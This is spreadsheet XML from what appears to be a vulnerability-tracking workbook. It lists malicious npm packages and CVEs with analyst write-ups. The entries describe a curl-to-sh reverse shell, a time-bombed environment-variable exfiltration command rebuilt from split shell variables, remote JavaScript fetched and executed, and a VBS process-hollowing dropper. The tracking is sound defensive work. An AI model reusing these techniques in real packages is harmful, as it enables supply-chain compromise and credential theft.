The npm package hardhat-kex@2.0.1 ships an obfuscated 4.5MB single-line bundle at lib/config.js (obfuscator.io-style string-array with a 26,234-entry table and numeric-dispatch wrapper, containing exec strings). The package main index.js unconditionally executes this bundle on require via `const config = require('./lib/config')`; the return value is never used, so the sole effect of importing the package is to run the obfuscated code. The surface API exported by index.js is an unrelated stub Express middleware that calls `next()`. The tarball additionally ships verbatim files from the pino logging library (lib/proto.js, levels.js, transport.js, worker.js, redaction.js, docs/, index.d.ts, README.md) despite the package being named for the Hardhat/Ethereum ecosystem and describing itself as a vulnerability-management tool; none of the pino sources are reachable through the exported API. The name/description/API mismatch combined with bundled pino cover-story files is a decoy pattern designed to make the tarball appear legitimate while the obfuscated loader is the only code that actually runs. Any project adding hardhat-kex as a dependency will execute the opaque payload on import.
</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17559</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17560</t>
        </is>
      </c>
      <c r="D217" s="5" t="inlineStr"/>
      <c r="E217" s="5" t="inlineStr"/>
      <c r="F217" s="5" t="inlineStr"/>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-spack</t>
        </is>
      </c>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e59c971c63de9d0a7f66c26093f528164990af10eca00a3a36b97d0c8b0a6d0d)
The package is published as hardhat-spack but presents itself internally as a pino-like logger. Its main export is a middleware factory that spawns lib/caller.js as a detached child process. caller.js and lib/const.js define a fake process.env object whose DEV_API_KEY, DEV_SECRET_KEY, and DEV_SECRET_VALUE are base64 blobs; DEV_API_KEY decodes to https://iphub-encrypted.vercel.app/api/auth/f1f097d93c318c92f0c5. caller.js base64-decodes that URL, POSTs to it, and passes the response body to `new Function.constructor("require", s)` and invokes it with the real require, giving the fetched JavaScript full Node capabilities (filesystem, child_process, network). The request is retried up to five times and failures are swallowed. The destination host is disposable Vercel infrastructure unrelated to any declared purpose, the URL and credential-shaped values are concealed with base64, and the executed code is attacker-mutable at any time.
</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17560</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17561</t>
        </is>
      </c>
      <c r="D218" s="5" t="inlineStr"/>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="inlineStr"/>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr">
        <is>
          <t>npm:insomnia-plugin-api-lint-helper</t>
        </is>
      </c>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f3572e41f2e2e83a3156c1b24bf8684c0149a508e45626e80c592657cfb475ba)
index.js, the package's main entry, runs at require() time with no user interaction. On load it spawns OS-native calculator processes via child_process.exec ('calc.exe' on Windows, 'open -a Calculator' on macOS, 'gnome-calculator' on Linux) to demonstrate arbitrary code execution; writes a marker file to the user's Desktop (INSOMNIA_RCE_PROOF.txt); and serializes the full process.env object with JSON.stringify and emits it to the console, disclosing any tokens, API keys, and other secrets present in the environment of the host process (typically Insomnia on a developer machine). The source comments self-identify the module as a proof-of-concept remote code execution payload targeting Insomnia's plugin loader. The arbitrary-exec, filesystem write outside the package directory, and bulk environment enumeration all fire unconditionally at load.
</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17561</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17562</t>
        </is>
      </c>
      <c r="D219" s="5" t="inlineStr"/>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="inlineStr"/>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr">
        <is>
          <t>npm:internallib_v923</t>
        </is>
      </c>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2d02d4c28dbcb2db331a6da7dba2476e3b7daf4f4d53d51d76d79ad4732d28a4)
index.js exports a command() function that shells out via /bin/bash -c to curl a payload from reverse-shell.sh and pipe it to sh, yielding a reverse shell to the hardcoded callback host 10.0.72.151:443. Any consumer requiring the package and invoking the exported API triggers remote-fetched shell execution with full-host control by the operator of the hardcoded callback. The manifest also declares a single dependency internallib_v79 and the sibling check.js invokes require('internallib_v79').command(), indicating the same payload shape is distributed across a package family with dependency-confusion-style naming (internallib_v&lt;n&gt;).
</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17562</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17563</t>
        </is>
      </c>
      <c r="D220" s="5" t="inlineStr"/>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="inlineStr"/>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr">
        <is>
          <t>npm:risk-detection</t>
        </is>
      </c>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4b74a904a25687bbc34ad321ea019c5083f9a3651457750ed36207a209798f77)
package.json declares a dependency `ltidisafe` whose source is an off-registry tarball URL (`https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.8.1.tgz`) rather than a semver range on the npm registry. The shipped `index.js` is an empty stub (`module.exports = {}`), so the manifest URL is the entire install-time surface. On `npm install`, npm fetches whatever bytes that URL returns — unpinned, no integrity hash, no registry publisher check — installs the resulting package, and runs any lifecycle scripts inside it. Whoever controls that bucket path controls code execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17563</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17564</t>
        </is>
      </c>
      <c r="D221" s="5" t="inlineStr"/>
      <c r="E221" s="5" t="inlineStr"/>
      <c r="F221" s="5" t="inlineStr"/>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>npm:tostpro</t>
        </is>
      </c>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2b31f6e946441400814984e1285717f9b2ee7fe5dacb7f0433f89396648a6183)
The npm package tostpro@100.2.0 ships a preinstall lifecycle hook that invokes test.sh, which runs automatically on `npm install`. The script assembles the command `curl` and the data source `env` from single-letter shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and splits the destination into `dom=https://abbishal.` plus `tld=com`, reconstructing them at runtime as `$i$h$l -d "`$b$s$a`" $dom$tld/sh/poc`. Execution is gated by `if [ `date +%s` -gt 1791141300 ]` (a Unix timestamp corresponding to roughly 2026-10-04); once that deadline passes, the output of `env` — the installer's full process environment, which routinely contains CI tokens, cloud credentials, and API keys — is POSTed to https://abbishal.com/sh/poc. The README states "No network access. No data collection," directly contradicting the shipped behavior. The string-splitting obfuscation, time-bomb gate, and cover-story README together indicate deliberate evasion.
</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17564</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17565</t>
        </is>
      </c>
      <c r="D222" s="5" t="inlineStr"/>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="inlineStr"/>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr">
        <is>
          <t>npm:typesens</t>
        </is>
      </c>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3ded39f31b2c2d4d73e0b576ab862c9ed90688153a43c359dae5b26854ad8738)
package.json declares postinstall `wscript.exe 4444.vbs`, which runs automatically on `npm install`. The shipped 4444.vbs (~765 KB) contains a multi-layer decryption chain (AES S-box, ChaCha20-IETF, SHA-256 constants XOR-masked with 0x5A5A5A5A) over ~665 base64 chunks, decodes a payload to %TEMP% as a.dat file, drops a PowerShell loader, and invokes powershell.exe to perform process hollowing on Windows. Function names in the VBS are randomized (PlatformProbeLVI, DeviceCatalogUBYQ, EndpointRegistryRFX) and the `CreateObject` target is XOR-decoded at runtime; a cover-story header labels the file as a 'Verdant Signals Corp Device Telemetry Aggregator'. The advertised library surface — src/index.js is a trivial zod-based email-domain check with no network I/O, and the README claims 'No installation scripts' and describes a 'booking-eligibility' utility — is a decoy contradicting the package.json `files` entry that ships 4444.vbs and the postinstall hook that runs it. The typosquat-shaped name (typesens) reinforces the lure framing.
</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17565</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17566</t>
        </is>
      </c>
      <c r="D223" s="5" t="inlineStr"/>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="inlineStr"/>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr">
        <is>
          <t>npm:unified-platform</t>
        </is>
      </c>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr"/>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f8d42d95f6d25be97f23633f7088e06ac7faf2bd7f4fbc20fa85b5be18c90f6b)
package.json declares a single dependency 'ltidisafe' sourced directly from the off-registry URL https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.8.2.tgz, with no registry version range and no integrity hash. On npm install, npm fetches and installs whatever bytes that URL currently serves, executing any lifecycle scripts contained inside the fetched tarball under the installer's account. The GCS bucket host is not tied to any declared publisher of this package, and the fetched content can be changed at any time without a corresponding package republish. The shipped index.js is an empty stub, so the manifest's off-registry fetch is the package's entire effect on the installer. The package name 'unified-platform' at the implausibly high version 99.9.1 is consistent with a dependency-confusion lure targeting an internal name.
</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17566</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T223"/>
  <conditionalFormatting sqref="E2:E22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23">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CVE-2026-88779</t>
        </is>
      </c>
      <c r="D2" s="5" t="inlineStr"/>
      <c r="E2" s="5" t="inlineStr"/>
      <c r="F2" s="5" t="inlineStr"/>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-07</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Citrix NetScaler ADC (formerly Citrix ADC) and Citrix NetScaler Gateway (formerly Citrix Gateway) contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow for a denial of service.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88779</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P1 - Act now</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88779</t>
        </is>
      </c>
      <c r="D2" s="5" t="inlineStr"/>
      <c r="E2" s="5" t="inlineStr"/>
      <c r="F2" s="5" t="inlineStr"/>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-07</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Citrix NetScaler ADC (formerly Citrix ADC) and Citrix NetScaler Gateway (formerly Citrix Gateway) contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow for a denial of service.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88779</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T2"/>
  <conditionalFormatting sqref="E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
    <cfRule type="cellIs" priority="5" operator="equal" dxfId="4">
      <formula>"Yes"</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T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CVE-2026-105207</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.0.0 through 3.4.15 and 4.0.0 before 4.17.3 creates links between user accounts and external identity providers without verifying a primary factor or the caller's permission, including on identify-only Login V2 sessions and via the User Service V2 AddIDPLink endpoint. An unauthenticated attacker knowing a victim's login name can bind their own external IdP identity to the victim's account and then sign in as the victim.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105207</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105209</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>ZITADEL 3.x before 3.4.15 and 4.x before 4.17.1 contains an improper authorization vulnerability: when issuing passkey or passwordless enrollment codes, it checks only the organization in the x-zitadel-orgid header, not the target user's organization. Attackers with user-write permission in one organization can obtain an enrollment code for a user in another organization on the same instance and register their own authenticator to take over that account.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105209</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103355</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates) unlimited-elements-for-elementor allows Blind SQL Injection.This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 2.0.20.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103355</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105215</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>ZITADEL before 3.4.14 and 4.x before 4.16.2 contains an authentication bypass in the hosted Login V1 UI because the 'external account not found' registration endpoint trusts client-supplied external identity fields without a completed IdP callback. Unauthenticated attackers can submit forged IDPConfigID and ExternalUserID values to pre-create an account bound to a victim's external IdP identity, which the victim's later genuine external login then signs into.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105215</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105086</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.699999999999999</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CWE-79</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo 12.4 through 29.2.0 contains a stored cross-site scripting vulnerability that allows authenticated uploaders to inject HTML by submitting doubly-encoded entities in video titles. Because safeString() strips tags before decoding entities and runs twice via setTitle() and save(), attackers can store markup that executes in trending, gallery, embed, and playlist pages.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105086</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105089</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
